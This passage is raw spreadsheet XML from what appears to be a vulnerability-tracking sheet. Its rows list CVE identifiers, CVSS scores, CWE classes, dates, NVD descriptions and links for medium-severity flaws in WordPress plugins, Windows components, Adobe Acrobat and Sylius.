t="n"><v>0.003</v></c><c r="I1165" s="5" t="inlineStr" /><c r="J1165" s="5" t="inlineStr" /><c r="K1165" s="5" t="inlineStr" /><c r="L1165" s="5" t="inlineStr" /><c r="M1165" s="5" t="inlineStr" /><c r="N1165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1165" s="5" t="inlineStr" /><c r="R1165" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S1165" s="5" t="inlineStr"><is><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is></c><c r="T1165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86726</t></is></c></row><row r="1166"><c r="A1166" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1166" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1166" s="5" t="inlineStr"><is><t>CVE-2026-86731</t></is></c><c r="D1166" s="5" t="n"><v>6.5</v></c><c r="E1166" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1166" s="5" t="inlineStr" /><c r="H1166" s="5" t="n"><v>0.002</v></c><c r="I1166" s="5" t="inlineStr" /><c r="J1166" s="5" t="inlineStr" /><c r="K1166" s="5" t="inlineStr" /><c r="L1166" s="5" t="inlineStr" /><c r="M1166" s="5" t="inlineStr" /><c r="N1166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1166" s="5" t="inlineStr" /><c r="R1166" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1166" s="5" t="inlineStr"><is><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is></c><c r="T1166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86731</t></is></c></row><row r="1167"><c r="A1167" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1167" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1167" s="5" t="inlineStr"><is><t>CVE-2026-12230</t></is></c><c r="D1167" s="5" t="n"><v>6.4</v></c><c r="E1167" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1167" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1167" s="5" t="inlineStr" /><c r="H1167" s="5" t="n"><v>0.002</v></c><c r="I1167" s="5" t="inlineStr" /><c r="J1167" s="5" t="inlineStr" /><c r="K1167" s="5" t="inlineStr" /><c r="L1167" s="5" t="inlineStr" /><c r="M1167" s="5" t="inlineStr" /><c r="N1167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1167" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1167" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1167" s="5" t="inlineStr" /><c r="R1167" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1167" s="5" t="inlineStr"><is><t>The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'layout_custom_css' parameter in all versions up to, and including, 4.3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t></is></c><c r="T1167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12230</t></is></c></row><row r="1168"><c r="A1168" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1168" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1168" s="5" t="inlineStr"><is><t>CVE-2026-33388</t></is></c><c r="D1168" s="5" t="n"><v>6.4</v></c><c r="E1168" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1168" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1168" s="5" t="inlineStr" /><c r="H1168" s="5" t="n"><v>0.003</v></c><c r="I1168" s="5" t="inlineStr" /><c r="J1168" s="5" t="inlineStr" /><c r="K1168" s="5" t="inlineStr" /><c r="L1168" s="5" t="inlineStr" /><c r="M1168" s="5" t="inlineStr" /><c r="N1168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1168" s="5" t="inlineStr" /><c r="R1168" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1168" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Credentials Manager functionality due to insufficient validation of user privileges. A remote authenticated user with limited privileges can view a limited subset of the available entries in the Credentials Manager. The actual credential values are not directly visible, but the user can delete entries or edit their properties. An attacker who deletes or edits an entry can disrupt authentication for dependent devices, and one who manipulates an entry's configuration may be able to indirectly obtain the credentials.</t></is></c><c r="T1168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33388</t></is></c></row><row r="1169"><c r="A1169" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1169" s="5" t="inlineStr"><is><t>CVE-2026-69874</t></is></c><c r="D1169" s="5" t="n"><v>6.4</v></c><c r="E1169" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1169" s="5" t="inlineStr" /><c r="H1169" s="5" t="n"><v>0.003</v></c><c r="I1169" s="5" t="inlineStr" /><c r="J1169" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1169"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169" s="5" t="inlineStr" /><c r="M1169" s="5" t="inlineStr" /><c r="N1169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1169" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1169" s="5" t="inlineStr" /><c r="R1169" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1169" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t></is></c></row><row r="1170"><c r="A1170" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1170" s="5" t="inlineStr"><is><t>CVE-2026-69878</t></is></c><c r="D1170" s="5" t="n"><v>6.4</v></c><c r="E1170" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1170" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1170" s="5" t="inlineStr" /><c r="H1170" s="5" t="n"><v>0.003</v></c><c r="I1170" s="5" t="inlineStr" /><c r="J1170" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1170" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1170" s="5" t="inlineStr" /><c r="M1170" s="5" t="inlineStr" /><c r="N1170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1170" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1170" s="5" t="inlineStr" /><c r="R1170" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1170" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t></is></c></row><row r="1171"><c r="A1171" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1171" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1171" s="5" t="inlineStr"><is><t>CVE-2026-70582</t></is></c><c r="D1171" s="5" t="n"><v>6.4</v></c><c r="E1171" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1171" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1171" s="5" t="inlineStr" /><c r="H1171" s="5" t="n"><v>0.002</v></c><c r="I1171" s="5" t="inlineStr" /><c r="J1171" s="5" t="inlineStr" /><c r="K1171" s="5" t="inlineStr" /><c r="L1171" s="5" t="inlineStr" /><c r="M1171" s="5" t="inlineStr" /><c r="N1171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1171" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1171" s="5" t="inlineStr" /><c r="R1171" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1171" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70582</t></is></c></row><row r="1172"><c r="A1172" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1172" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1172" s="5" t="inlineStr"><is><t>CVE-2026-71338</t></is></c><c r="D1172" s="5" t="n"><v>6.4</v></c><c r="E1172" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1172" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1172" s="5" t="inlineStr" /><c r="H1172" s="5" t="n"><v>0.003</v></c><c r="I1172" s="5" t="inlineStr" /><c r="J1172" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1172" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1172" s="5" t="inlineStr" /><c r="M1172" s="5" t="inlineStr" /><c r="N1172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1172" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1172" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1172" s="5" t="inlineStr" /><c r="R1172" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1172" s="5" t="inlineStr"><is><t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t></is></c></row><row r="1173"><c r="A1173" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1173" s="5" t="inlineStr"><is><t>CVE-2026-72947</t></is></c><c r="D1173" s="5" t="n"><v>6.4</v></c><c r="E1173" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1173" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1173" s="5" t="inlineStr" /><c r="H1173" s="5" t="n"><v>0.003</v></c><c r="I1173" s="5" t="inlineStr" /><c r="J1173" s="5" t="inlineStr" /><c r="K1173" s="5" t="inlineStr" /><c r="L1173" s="5" t="inlineStr" /><c r="M1173" s="5" t="inlineStr" /><c r="N1173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1173" s="5" t="inlineStr" /><c r="R1173" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1173" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72947</t></is></c></row><row r="1174"><c r="A1174" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1174" s="5" t="inlineStr"><is><t>CVE-2026-76931</t></is></c><c r="D1174" s="5" t="n"><v>6.4</v></c><c r="E1174" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1174" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1174" s="5" t="inlineStr" /><c r="H1174" s="5" t="n"><v>0.002</v></c><c r="I1174" s="5" t="inlineStr" /><c r="J1174" s="5" t="inlineStr" /><c r="K1174" s="5" t="inlineStr" /><c r="L1174" s="5" t="inlineStr" /><c r="M1174" s="5" t="inlineStr" /><c r="N1174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1174" s="5" t="inlineStr" /><c r="R1174" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1174" s="5" t="inlineStr"><is><t>The Zephyr Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘message’ parameter in all versions up to, and including, 3.3.205 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability can only be exploited when the 'Directly link to project' plugin setting is disabled.</t></is></c><c r="T1174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76931</t></is></c></row><row r="1175"><c r="A1175" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1175" s="5" t="inlineStr"><is><t>CVE-2026-77887</t></is></c><c r="D1175" s="5" t="n"><v>6.4</v></c><c r="E1175" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1175" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1175" s="5" t="inlineStr" /><c r="H1175" s="5" t="n"><v>0.002</v></c><c r="I1175" s="5" t="inlineStr" /><c r="J1175" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1175" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1175" s="5" t="inlineStr" /><c r="M1175" s="5" t="inlineStr" /><c r="N1175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1175" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1175" s="5" t="inlineStr" /><c r="R1175" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1175" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t></is></c></row><row r="1176"><c r="A1176" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1176" s="5" t="inlineStr"><is><t>CVE-2026-77891</t></is></c><c r="D1176" s="5" t="n"><v>6.4</v></c><c r="E1176" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1176" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1176" s="5" t="inlineStr" /><c r="H1176" s="5" t="n"><v>0.002</v></c><c r="I1176" s="5" t="inlineStr" /><c r="J1176" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1176" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1176" s="5" t="inlineStr" /><c r="M1176" s="5" t="inlineStr" /><c r="N1176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1176" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1176" s="5" t="inlineStr" /><c r="R1176" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1176" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t></is></c></row><row r="1177"><c r="A1177" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1177" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1177" s="5" t="inlineStr"><is><t>CVE-2026-53639</t></is></c><c r="D1177" s="5" t="n"><v>6.3</v></c><c r="E1177" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1177" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1177" s="5" t="inlineStr" /><c r="H1177" s="5" t="n"><v>0.005</v></c><c r="I1177" s="5" t="inlineStr" /><c r="J1177" s="5" t="inlineStr" /><c r="K1177" s="5" t="inlineStr" /><c r="L1177" s="5" t="inlineStr" /><c r="M1177" s="5" t="inlineStr" /><c r="N1177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1177" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1177" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1177" s="5" t="inlineStr" /><c r="R1177" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1177" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, the `GET /api/v2/shop/payment-requests/{hash}` and `PUT /api/v2/shop/payment-requests/{hash}` endpoints look up the payment request solely by the hash from the URL. No ownership check is performed against the authenticated customer or the underlying order. An attacker who obtains a payment request hash can read the payment request and, through the `payment` IRI in the response, recover the underlying order's `tokenValue` (which itself grants access to the full order, items, addresses, customer email, totals); and/or update the payment request payload (e.g. `target_path`, `after_path`). These fields are used by the front-end controller to redirect the user after the payment, so an attacker can flip them to an attacker-controlled URL and intercept the buyer. The hash is a UUID, so it has to be obtained out-of-band (logs, shared links, referrer headers, a co-located client), but once it is known no other credential is required, neither authentication nor knowledge of the order token. The creation endpoint `POST /api/v2/shop/orders/{tokenValue}/payment-requests` shares the same flaw: it resolves the target order solely from the `tokenValue` in the URL without verifying that the caller owns the order. The issue is fixed in versions 2.0.18, 2.1.15, and 2.2.6. As a workaround, add a query extension that filters the `GET` operation; decorate the `PUT` state provider, guard the `POST` creation endpoint with a command-bus middleware, and wire the services.</t></is></c><c r="T1177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53639</t></is></c></row><row r="1178"><c r="A1178" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1178" s="5" t="inlineStr"><is><t>CVE-2026-81824</t></is></c><c r="D1178" s="5" t="n"><v>6.3</v></c><c r="E1178" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1178" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1178" s="5" t="inlineStr" /><c r="H1178" s="5" t="n"><v>0.002</v></c><c r="I1178" s="5" t="inlineStr" /><c r="J1178" s="5" t="inlineStr" /><c r="K1178" s="5" t="inlineStr" /><c r="L1178" s="5" t="inlineStr" /><c r="M1178" s="5" t="inlineStr" /><c r="N1178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1178" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1178" s="5" t="inlineStr" /><c r="R1178" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1178" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant to run arbitrary JavaScript code in a browser session of a PIMBoards user who was socially engineered to click on a malicious link.</t></is></c><c r="T1178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81824</t></is></c></row><row r="1179"><c r="A1179" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1179" s="5" t="inlineStr"><is><t>CVE-2026-81904</t></is></c><c r="D1179" s="5" t="n"><v>6.3</v></c><c r="E1179" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1179" s="5" t="inlineStr"><is><t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t></is></c><c r="G1179" s="5" t="inlineStr" /><c r="H1179" s="5" t="n"><v>0.003</v></c><c r="I1179" s="5" t="inlineStr" /><c r="J1179" s="5" t="inlineStr" /><c r="K1179" s="5" t="inlineStr" /><c r="L1179" s="5" t="inlineStr" /><c r="M1179" s="5" t="inlineStr" /><c r="N1179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1179" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1179" s="5" t="inlineStr" /><c r="R1179" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1179" s="5" t="inlineStr"><is><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is></c><c r="T1179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81904</t></is></c></row><row r="1180"><c r="A1180" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1180" s="5" t="inlineStr"><is><t>CVE-2026-81994</t></is></c><c r="D1180" s="5" t="n"><v>6.3</v></c><c r="E1180" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1180" s="5" t="inlineStr" /><c r="H1180" s="5" t="n"><v>0.003</v></c><c r="I1180" s="5" t="inlineStr" /><c r="J1180" s="5" t="inlineStr" /><c r="K1180" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1180" s="5" t="inlineStr" /><c r="M1180" s="5" t="inlineStr" /><c r="N1180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1180" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1180" s="5" t="inlineStr" /><c r="R1180" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="S1180" s="5" t="inlineStr"><is><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is></c><c r="T1180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81994</t></is></c></row><row r="1181"><c r="A1181" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1181" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1181" s="5" t="inlineStr"><is><t>CVE-2026-81997</t></is></c><c r="D1181" s="5" t="n"><v>6.3</v></c><c r="E1181" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1181" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1181" s="5" t="inlineStr" /><c r="H1181" s="5" t="n"><v>0.002</v></c><c r="I1181" s="5" t="inlineStr" /><c r="J1181" s="5" t="inlineStr" /><c r="K1181" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1181" s="5" t="inlineStr" /><c r="M1181" s="5" t="inlineStr" /><c r="N1181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1181" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1181" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1181" s="5" t="inlineStr" /><c r="R1181" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1181" s="5" t="inlineStr"><is><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is></c><c r="T1181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81997</t></is></c></row><row r="1182"><c r="A1182" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1182" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1182" s="5" t="inlineStr"><is><t>CVE-2026-84942</t></is></c><c r="D1182" s="5" t="n"><v>6.3</v></c><c r="E1182" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1182" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G1182" s="5" t="inlineStr" /><c r="H1182" s="5" t="n"><v>0.003</v></c><c r="I1182" s="5" t="inlineStr" /><c r="J1182" s="5" t="inlineStr" /><c r="K1182" s="5" t="inlineStr" /><c r="L1182" s="5" t="inlineStr" /><c r="M1182" s="5" t="inlineStr" /><c r="N1182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1182" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1182" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1182" s="5" t="inlineStr" /><c r="R1182" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1182" s="5" t="inlineStr"><is><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is></c><c r="T1182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84942</t></is></c></row><row r="1183"><c r="A1183" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1183" s="5" t="inlineStr"><is><t>CVE-2026-86590</t></is></c><c r="D1183" s="5" t="n"><v>6.3</v></c><c r="E1183" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1183" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G1183" s="5" t="inlineStr" /><c r="H1183" s="5" t="n"><v>0.004</v></c><c r="I1183" s="5" t="inlineStr" /><c r="J1183" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K1183" s="5" t="inlineStr" /><c r="L1183" s="5" t="inlineStr" /><c r="M1183" s="5" t="inlineStr" /><c r="N1183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1183" s="5" t="inlineStr" /><c r="R1183" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1183" s="5" t="inlineStr"><is><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is></c><c r="T1183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t></is></c></row><row r="1184"><c r="A1184" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1184" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1184" s="5" t="inlineStr"><is><t>CVE-2026-18090</t></is></c><c r="D1184" s="5" t="n"><v>6.1</v></c><c r="E1184" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1184" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1184" s="5" t="inlineStr" /><c r="H1184" s="5" t="n"><v>0.002</v></c><c r="I1184" s="5" t="inlineStr" /><c r="J1184" s="5" t="inlineStr" /><c r="K1184" s="5" t="inlineStr" /><c r="L1184" s="5" t="inlineStr" /><c r="M1184" s="5" t="inlineStr" /><c r="N1184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1184" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1184" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1184" s="5" t="inlineStr" /><c r="R1184" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1184" s="5" t="inlineStr"><is><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is></c><c r="T1184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18090</t></is></c></row><row r="1185"><c r="A1185" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1185" s="5" t="inlineStr"><is><t>CVE-2026-19872</t></is></c><c r="D1185" s="5" t="n"><v>6.1</v></c><c r="E1185" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1185" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1185" s="5" t="inlineStr" /><c r="H1185" s="5" t="n"><v>0.003</v></c><c r="I1185" s="5" t="inlineStr" /><c r="J1185" s="5" t="inlineStr" /><c r="K1185" s="5" t="inlineStr" /><c r="L1185" s="5" t="inlineStr" /><c r="M1185" s="5" t="inlineStr" /><c r="N1185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1185" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1185" s="5" t="inlineStr" /><c r="R1185" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1185" s="5" 